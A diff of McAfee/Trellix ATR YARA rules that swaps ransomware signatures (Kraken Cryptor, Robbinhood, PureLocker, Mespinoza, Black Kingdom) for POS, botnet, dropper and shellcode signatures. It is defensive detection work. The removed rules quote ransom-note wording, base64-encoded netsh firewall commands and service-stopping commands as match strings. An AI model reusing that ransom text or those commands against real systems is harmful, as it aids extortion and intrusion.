 	meta:
-		description = "Rule to detect the Kraken Cryptor Ransomware"
+		description = "Rule to detect Alina POS"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "7e1e5fa8-6d87-5e64-a8d4-4dae55ab76ca"
-		date = "2018-09-30"
+		id = "9588aa10-d5e4-55f4-998c-a01503a53d3a"
+		date = "2013-08-08"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Kraken.yar#L32-L64"
+		reference = "https://www.pandasecurity.com/mediacenter/pandalabs/alina-pos-malware/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_alina_pos_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd"
-		logic_hash = "2ad7f0bf6110eab79e0f9541c49ae44089ebca3f91ffa80de874d60d5a7ed266"
+		hash = "28b0c52c0630c15adcc857d0957b3b8002a4aeda3c7ec40049014ce33c7f67c3"
+		logic_hash = "9bb8260e3a47567e2460dd474fb74e57987e3d79eb30cdbc2a45b88a16ba1ca2"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "POS, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Kraken"
+		malware_type = "pos"
+		malware_family = "Pos:W32/Alina"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "Kraken Cryptor" fullword ascii nocase
-		$s2 = "support_email" fullword ascii
-		$fw1 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iU01CIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD00" ascii
-		$fw2 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iUkRQIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD0z" ascii
-		$fw3 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iUkRQIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD0z" ascii
-		$fw4 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iU01CIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD00" ascii
-		$uac = "<!--<requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\" />-->   " fullword ascii
+		$pdb = "\\Users\\dice\\Desktop\\SRC_adobe\\src\\grab\\Release\\Alina.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of ( $fw* ) or all of ( $s* ) or $uac
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and any of them
 }
-rule TRELLIX_ARC_Ransom_Note_Kraken_Cryptor_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_MALW_Fritzfrog : BOTNET FILE
 {
 	meta:
-		description = "Rule to detect the ransom note delivered by Kraken Cryptor Ransomware"
+		description = "Rule to detect Fritzfrog"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "dec9d364-daf9-5a1d-8e72-ed4dd2aeecdf"
-		date = "2018-09-30"
-		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Kraken.yar#L66-L108"
+		id = "4c553279-7e0c-5602-944d-ad8a47edf4ea"
+		date = "2020-08-20"
+		modified = "2020-08-20"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_fritzfrog.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "d4acdf0716320b0f757b8dbc97bb9d407460b2d69dc8e12292539e823be0f57d"
+		logic_hash = "488c807ecf0a9e981b2c1f2f5bb2e3072952d11f7cbf3a354bc85dc8e88b8b09"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BOTNET, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Kraken"
+		malware_type = "botnet"
+		malware_family = "Botnet:W32/Fritzfrog"
+		actor_type = "Cybercrime"
+		hash1 = "103b8404dc64c9a44511675981a09fd01395ee837452d114f1350c295357c046"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "No way to recovery your files without \"KRAKEN DECRYPTOR\" software and your computer \"UNIQUE KEY\"!" fullword ascii
-		$s2 = "Are you want to decrypt all of your encrypted files? If yes! You need to pay for decryption service to us!" fullword ascii
-		$s3 = "The speed, power and complexity of this encryption have been high and if you are now viewing this guide." fullword ascii
-		$s4 = "Project \"KRAKEN CRYPTOR\" doesn't damage any of your files, this action is reversible if you follow the instructions above." fullword ascii
-		$s5 = "https://localBitcoins.com" fullword ascii
-		$s6 = "For the decryption service, we also need your \"KRAKEN ENCRYPTED UNIQUE KEY\" you can see this in the top!" fullword ascii
-		$s7 = "-----BEGIN KRAKEN ENCRYPTED UNIQUE KEY----- " fullword ascii
-		$s8 = "All your files has been encrypted by \"KRAKEN CRYPTOR\"." fullword ascii
-		$s9 = "It means that \"KRAKEN CRYPTOR\" immediately removed form your system!" fullword ascii
-		$s10 = "After your payment made, all of your encrypted files has been decrypted." fullword ascii
-		$s11 = "Don't delete .XKHVE files! there are not virus and are your files, but encrypted!" fullword ascii
-		$s12 = "You can decrypt one of your encrypted smaller file for free in the first contact with us." fullword ascii
-		$s13 = "You must register on this site and click \"BUY Bitcoins\" then choose your country to find sellers and their prices." fullword ascii
-		$s14 = "-----END KRAKEN ENCRYPTED UNIQUE KEY-----" fullword ascii
-		$s15 = "DON'T MODIFY \"KRAKEN ENCRYPT UNIQUE KEY\"." fullword ascii
-		$s16 = "# Read the following instructions carefully to decrypt your files." fullword ascii
-		$s17 = "We use best and easy way to communications. It's email support, you can see our emails below." fullword ascii
-		$s18 = "DON'T USE THIRD PARTY, PUBLIC TOOLS/SOFTWARE TO DECRYPT YOUR FILES, THIS CAUSE DAMAGE YOUR FILES PERMANENTLY." fullword ascii
-		$s19 = "https://en.wikipedia.org/wiki/Bitcoin" fullword ascii
-		$s20 = "Please send your message with same subject to both address." fullword ascii
+		$pattern = { 7F454C4602010100000000000000000002003E000100000090D34500000000004000000000000000C8010000000000000000000040003800070040000D000300060000000400000040000000000000004000400000000000400040000000000088010000000000008801000000000000001000000000000004000000040000009C0F0000000000009C0F4000000000009C0F400000000000640000000000000064000000000000000400000000000000010000000500000000000000000000000000400000000000000040000000000083F23E000000000083F23E00000000000010000000000000010000000400000000003F000000000000007F000000000000007F00000000006C834500000000006C834500000000000010000000000000010000000600000000908400000000000090C400000000000090C4000000000060EC0400000000005809070000000000001000000000000051E574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000080150465002A000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000006000000000000000010400000000000001000000000000083E23E00000000000000000000000000100000000000000000000000000000004100000001000000020000000000000000007F000000000000003F0000000000C0271B0000000000000000000000000020000000000000000000000000000000720000000300000000000000000000000000000000000000C0275A00000000007C000000000000000000000000000000010000000000000000000000000000004900000001000000020000000000000040289A000000000040285A0000000000D83600000000000000000000000000002000000000000000000000000000000053000000010000000200000000000000185F9A0000000000185F5A0000000000380D0000000000000000000000000000080000000000000000000000000000005D000000010000000200000000000000506C9A0000000000506C5A0000000000000000000000000000000000000000000100000000000000000000000000000067000000010000000200000000000000606C9A0000000000606C5A00000000000C172A0000000000000000000000000020000000000000000000000000000000070000000100000003000000000000000090C400000000000090840000000000004B0300000000000000000000000000200000000000000000000000000000001200000001000000030000000000000000DBC7000000000000DB87000000000050A101000000000000000000000000002000000000000000000000000000000018000000080000000300000000000000607CC90000000000607C890000000000D0E80100000000000000000000000000200000000000000000000000000000001D0000000800000003000000000000004065CB000000000040658B00000000001834000000000000000000000000000020000000000000000000000000000000270000000700000002000000000000009C0F4000000000009C0F00000000000064000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 }
 
 	condition:
-		uint16( 0 ) == 0x4120 and filesize < 9KB and all of them
+		uint16( 0 ) == 0x457f and filesize < 26000KB and all of them
 }
-rule TRELLIX_ARC_Robbinhood_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Kartoxa_Malware_Pdb : POS FILE
 {
 	meta:
-		description = "Robbinhood GoLang ransowmare"
-		author = "Christiaan Beek | McAfee ATR"
-		id = "b2654d00-330e-511e-b8f1-75aa7b57d040"
-		date = "2019-05-10"
+		description = "Rule to detect Kartoxa POS based on the PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "3d2dbf22-5d8f-5f19-9048-2d021ada22c8"
+		date = "2010-10-09"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_RobbinHood.yar#L1-L37"
+		reference = "https://securitynews.sonicwall.com/xmlpost/guatambu-new-multi-component-infostealer-drops-kartoxa-pos-malware-apr-08-2016/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_backdoor_katorxa_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "9977ba861016edef0c3fb38517a8a68dbf7d3c17de07266cfa515b750b0d249e"
-		logic_hash = "19a1b7d92bc49dee6da3fb4c053b118e6475aeca43e891d46470c2c09c148038"
+		hash = "86dd21b8388f23371d680e2632d0855b442f0fa7e93cd009d6e762715ba2d054"
+		logic_hash = "6e1810af386f3aada4cd1d72f76d8210d201808c8fe1d21d379ff1a825d93710"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "POS, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Robbinhood"
+		malware_type = "pos"
+		malware_family = "Pos:W32/Kartoxa"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = ".enc_robbinhood" nocase
-		$s2 = "sc.exe stop SQLAgent$SQLEXPRESS" nocase
-		$s3 = "pub.key" nocase
-		$s4 = "main.EnableShadowFucks" nocase
-		$s5 = "main.EnableRecoveryFCK" nocase
-		$s6 = "main.EnableLogLaunders" nocase
-		$s7 = "main.EnableServiceFuck" nocase
-		$op0 = { 8d 05 2d 98 51 00 89 44 24 30 c7 44 24 34 1d }
-		$op1 = { 8b 5f 10 01 c3 8b 47 04 81 c3 b5 bc b0 34 8b 4f }
-		$op2 = { 0f b6 34 18 8d 7e d0 97 80 f8 09 97 77 39 81 fd }
+		$pdb = "\\vm\\devel\\dark\\mmon\\Release\\mmon.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $s* ) ) and all of ( $op* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and any of them
 }
-rule TRELLIX_ARC_Purelocker_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Dropper_Demekaf_Pdb : DROPPER FILE
 {
 	meta:
-		description = "Rule to detect PureLocker ransomware based on binary sequences"
+		description = "Rule to detect Demekaf dropper based on PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "3d945869-9faa-59de-add6-d664a7beef6f"
-		date = "2019-11-13"
+		id = "b49f42c1-d737-5afa-b547-7268e4cde360"
+		date = "2011-03-26"
 		modified = "2020-08-14"
-		reference = "https://www.pandasecurity.com/mediacenter/security/purelocker-ransomware-servers/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_PureLocker.yar#L1-L25"
+		reference = "https://v.virscan.org/Trojan-Dropper.Win32.Demekaf.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_dropper_demekaf_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "9f39f0ef922023a79919f5b41a7acda6c08373af8f5fd2d4c4dcaca6146970ea"
+		hash = "fab320fceb38ba2c5398debdc828a413a41672ce9745afc0d348a0e96c5de56e"
+		logic_hash = "89c0c1da1f8997b12a446c93bbde200e62fac9cab2a9a17147b268d435bdc3b6"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "DROPPER, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/PureLocker"
+		malware_type = "dropper"
+		malware_family = "Dropper:W32/Demekaf"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$sequence = { 31??FF????E8????????83????5BC2????555357BA????????83????C7????????????4A75??E8????????8B????????????8D????E8????????8B????????????8D??????E8????????FF????8D??????????59E8????????75??FF??????8D??????????59E8????????75??EB??B8????????EB??31??21??74??31??0FBE??E9????????8D??????C7????????????C7????????????66??????????FF??????E8????????89??????52E8????????5A5052E8????????5A50FF??????E8????????8D????????????50E8????????8B??????01??89??????8B??????83????53E8????????89??????8B??????21??75??31??0FBE??E9????????68????????68????????FF????????????FF??????E8????????FF????E8????????89??01??89????????????8B????????????83????53E8????????89????????????8B????????????21??75??FF??????E8????????31??0FBE??E9????????68????????68????????FF??????FF????????????E8????????0FBE??????????83????0F85????????8B??????83????53E8????????89????????????8B????????????21??75??E9????????68????????68????????FF??????FF????????????E8????????FF??????E8????????68????????8D??????508D??????5068????????68????????68????????31??5068????????68????????FF????????????FF????????????68????????E8????????89??????8B??????21??75??31??0FBE??E9????????8D??????FF????E8????????8D??????FF????E8????????FF????????????E8????????FF????????????E8????????B8????????0FBE??E9????????EB??68????????8D??????508D??????5068????????68????????68????????31??5068????????68????????FF??????FF????????????68????????E8????????89??????8B??????21??75??31??0FBE??E9????????8D??????508D??????FF????E8????????89????????????FF??????E8????????C7??????????????FF????????????E8????????C7????????????????????C7????????????????????8B????????????21??74??E9????????0FBE????????????83????75??68????????68????????8D????????????5068????????8D??????FF????E8????????89??????EB??68????????68????????8D????????????5068????????8D??????FF????E8????????89??????8B??????21??74??E9????????0FBE????????????83????75??8D????????????8D????FF????FF??8F??????8F??????EB??8D????????????8B????9952508F??????8F??????FF??????FF??????5B5F83????7F??7C??83????77??31??EB??B8????????09??75??E9????????0FBE????????????83????75??68????????E8????????89????????????8B????????????21??75??E9????????68????????68????????68????????FF????????????FF????????????FF????????????8D??????FF????E8????????89????????????EB??68????????E8????????89??????8B??????21??75??E9????????68????????68????????FF??????8B????????????508D??????FF????E8????????89????????????8B????????????21??74??E9????????0FBE????????????83????75??8B????????????21??75??E9????????8B????????????8D????FF????FF??5B5F83????75??83????74??31??EB??B8????????09??74??E9????????EB??8B??????21??75??E9????????8B??????8B????21??75??E9????????0FBE????????????83????75??C7????????????????????FF????????????E8????????89????????????C7????????????????????68????????68????????FF????????????FF????????????8B????????????8D????FF????FF??8D??????FF????E8????????89????????????EB??C7????????????????????FF????????????E8????????89????????????C7????????????????????68????????FF????????????FF????????????8B????????????FF????8D??????FF????E8????????89????????????8B????????????21??74??E9????????0FBE????????????83????75??8B????????????21??7E??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????EB??8B??????21??7E??68????????68????????FF??????E8????????FF??????E8????????C7??????????????0FBE????????????83????75??8B????????????21??75??E9????????8B????????????8D????89??21??75??E9????????EB??8B????????????21??75??E9????????8B????????????8D????89??21??75??E9????????8B??????83????53E8????????89????????????8B????????????21??75??E9????????68????????68????????FF??????FF????????????E8????????0FBE????????????83????75??68????????68????????FF??????FF????????????8B????????????8D????FF????FF??8D??????FF????E8????????89????????????EB??68????????FF??????FF????????????8B????????????FF????8D??????FF????E8????????89????????????FF????????????E8????????C7????????????????????0FBE????????????83????75??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????EB??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????8B????????????21??74??EB??68????????8D??????FF????E8????????89????????????8B????????????21??74??EB??0FBE????????????83????75??68????????31??508D??????FF????E8????????C6????????8D??????FF????E8????????8D??????FF????E8????????0FBE??????0FBE??E9????????8B????????????21??7E??FF????????????E8????????8B????????????21??7E??FF????????????E8????????8B????????????21??7E??FF????????????E8????????8B??????21??7E??FF??????E8????????8B????????????21??7E??FF????????????E8????????8D??????8B????21??7E??68????????8D??????FF????E8????????8D??????8B????21??7E??8D??????FF????E8????????8D??????8B????21??7E??8D??????FF????E8????????31??0FBE??EB??31??FF????E8????????FF????????????E8????????FF??????E8????????81??????????5F5B5DC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????31??C2????5553BA????????83????C7????????????4A75??E8????????8B??????8D????E8????????83????????????0F84????????FF????E8????????89??01??89??????8B??????83????53E8????????89??????83????????74??68????????68????????FF??????FF??????E8????????89??3B??????75??8B??????83????538D??????5866??????FF??????5866??????FF??????5889????FF??????????5889??????8D??????508D??????5068????????68????????FF??????89??21??75??FF??????5889??????FF??????E8????????8B??????EB??31??FF????E8????????83????5B5DC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????31??5050E8????????FF??????E8????????52E8????????5A50FF??????????8D??????????50E8????????8D??????50E8????????52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????8D??????50E8????????FF????8D??????????59E8????????74??52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????588B??????52E8????????8D??????50E8????????EB??8B????52E8????????5A5052E8????????8B??????52E8????????8D??????50E8????????8B????52E8????????5A5052E8????????5850E8????????5A01??EB??E8????????66????????FF????E8????????FF??????E8????????83????C331??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????555331??50505050E8????????C7??????????????FF??????E8????????89????8B????21??75??31??EB??8D??????50FF??????FF??????68????????E8????????89??21??75??8B????FF????5889??????68????????68????????FF??????E8????????FF????E8????????8B??????EB??31??83????5B5DC35331??50505050E8????????8B??????8D????E8????????FF????E8????????89??????8B??????83????53E8????????89??????83????????74??68????????FF??????FF??????FF??????E8????????21??74??FF??????FF??????68????????E8????????89??F7??89??????FF??????E8????????8B??????EB??31??FF????E8????????83????5BC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????5553BA????????83????C7????????????4A75??E8????????8B??????8D????E8????????FF????8D??????????59E8????????74??31??E9????????52E8????????5A50FF??????????8D??????????50E8????????8B??????52E8????????8D??????50E8????????FF??????E8????????89??01??89??????8B??????83????53E8????????89??????83????????0F84????????68????????68????????FF??????FF??????E8????????89??3B??????0F85????????FF??????8D??????5866??????8B??????83????535866??????FF??????5889????C7??????????????8D??????????8D??????E8????????8D??????C7????????????C7????????????8D??????505889????68????????68????????8D??????508D??????5068????????8D??????50E8????????89??21??75??8B??????21??7E??B8????????EB??31??21??74??FF??????E8????????C7??????????????68????????68????????8D??????508D??????50FF??????E8????????89??21??75??8D??????FF????5889??????FF??????E8????????8B??????21??7E??FF??????E8????????8B??????EB??31??FF??????E8????????FF????E8????????83????5B5DC2????555357BA????????83????C7???????????? }
+		$pdb = "\\vc\\res\\fake1.19-jpg\\fake\\Release\\fake.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
 }
-
-rule TRELLIX_ARC_Ransom_Mespinoza : FILE
+rule TRELLIX_ARC_Shellcode_Mykins_Botnet : SHELLCODE FILE
 {
 	meta:
-		description = "rule to detect Mespinoza ransomware"
-		author = "Christiaan Beek @ McAfee ATR"
-		id = "70a76bc4-e0cb-5caa-bb64-1a732349d2ce"
-		date = "2020-11-24"
-		modified = "2020-11-24"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Mespinoza.yar#L3-L27"
+		description = "Rule to detect the shellcode used in the MyKins Botnet"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "9dc80b27-59e2-5925-9bb7-64a54241f52b"
+		date = "2018-01-24"
+		modified = "2020-08-14"
+		reference = "https://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_shellcode_mykins_botnet.yar#L1-L27"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "e245fb9a71d86209690a6f4c7aa38c10dbd32cda2ea3ecde08d0d94e896381cb"
+		logic_hash = "5fa54c41a423d776d05bdac5b171ee685f54372b4e6aa41b57cce769ac2c6976"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		malware_family = "ransom_Win_Mespinoza"
-		hash1 = "e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead"
-		hash2 = "48355bd2a57d92e017bdada911a4b31aa7225c0b12231c9cbda6717616abaea3"
-		hash3 = "e4287e9708a73ce6a9b7a3e7c72462b01f7cc3c595d972cf2984185ac1a3a4a8"
-
-	strings:
-		$s1 = "update.bat" fullword ascii
-		$s2 = "protonmail.com" fullword ascii
-		$s3 = "Every byte on any types of your devices was encrypted." fullword ascii
-		$s4 = "To get all your data back contact us:" fullword ascii
-		$s5 = "What to do to get all data back?" fullword ascii
-		$s6 = "Don't try to use backups because it were encrypted too." fullword ascii
-		$op0 = { 83 f8 4b 75 9e 0f be 46 ff 8d 4d e0 ff 34 85 50 }
-		$op1 = { c6 05 34 9b 47 00 00 e8 1f 0c 03 00 59 c3 cc cc }
-		$op2 = { e8 ef c5 fe ff b8 ff ff ff 7f eb 76 8b 4d 0c 85 }
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and pe.imphash ( ) == "b5e8bd2552848bb7bf2f28228d014742" and ( 8 of them ) and 2 of ( $op* ) ) or ( all of them )
-}
-rule TRELLIX_ARC_Ransom_Black_Kingdom : RANSOMWARE FILE
-{
-	meta:
-		description = "Rule to detect Black Kingdom ransomware that is spread using the latest Exchange vulns"
-		author = "McAfee ATR"
-		id = "c38e6dbf-7fb9-52f0-acd0-f824647b6041"
-		date = "2025-06-01"
-		modified = "2021-04-06"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/ransom_BlackKingDom.yar#L3-L49"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "334e84a9469367ed64509203feb61b5f64d5a7e38d29ff5c5089631246b06588"
-		score = 50
-		quality = 68
-		tags = "RANSOMWARE, FILE"
-		malware_type = "ransomware"
-		malware_family = "Ransomware:W32/BlackKingdom_March2021"
+		tags = "SHELLCODE, FILE"
+		rule_version = "v1"
+		malware_type = "shellcode"
+		malware_family = "ShellCode:W32/MyKins"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$0 = {7D3F634F627C5EC4D893189F1731F624A6AD458C3D89E9CB22C69EC4B4B588B1A7307D8963EC294C5B718C3D85692B8EB1A730732F8EB16F65EA5CEC17834A665E}
-		$1 = {3E774F2038FDE77377253CD11BFEB6FB82CF6A03E1B34E134C78A2CFDC1B7CD63AD167EE4E78A227FEF694EE3369143D1B0E84CF7CDAE7C3037C263DD15B979F}
-		$2 = {0C674D0A2427CDDD9B68213EC0B4A5DF94B19D39BEC0C562346FC7A1D32C0FA5BC9D963440910709A2365360650F5A909685912220EEC0F8157B3E2B95EA2CE9}
-		$3 = {7B7251266178C52BA731333F9E8A1C327A239FB81B901BAB2755FCAFD8A753F47991516A5C98A6CAAC9A1D5065DE565D87F120B3519DD91E09D353B7120EF9F2}
-		$4 = {2E233E25767037CA68F9C0F026A5CDDCC08FC0DCE21F61C612F1983A29BD3D986F8239A7692B0EBD478B6C8115564D5B0671346CF7CDDB612247EA7A4FAA7C71}
-		$5 = {2B2C3249094C8A1A9734E7515D10F78FD1B9339DF1902AC1D4ADE70C27C8A2CA7F3416B7B9F0D10E67519D589B8AD64D6435CC2DF4C2092A4BCEF7053B194AE5}
-		$6 = {0B297C7D79ECD339B30E87775B6769909CD886D1FBBAF2041DCC4FB11B5BA777AA626A9E8CAC14F64BEA5299A8E304A22BA25FA4F7AC4B95E8ACC42EC33A3DE4}
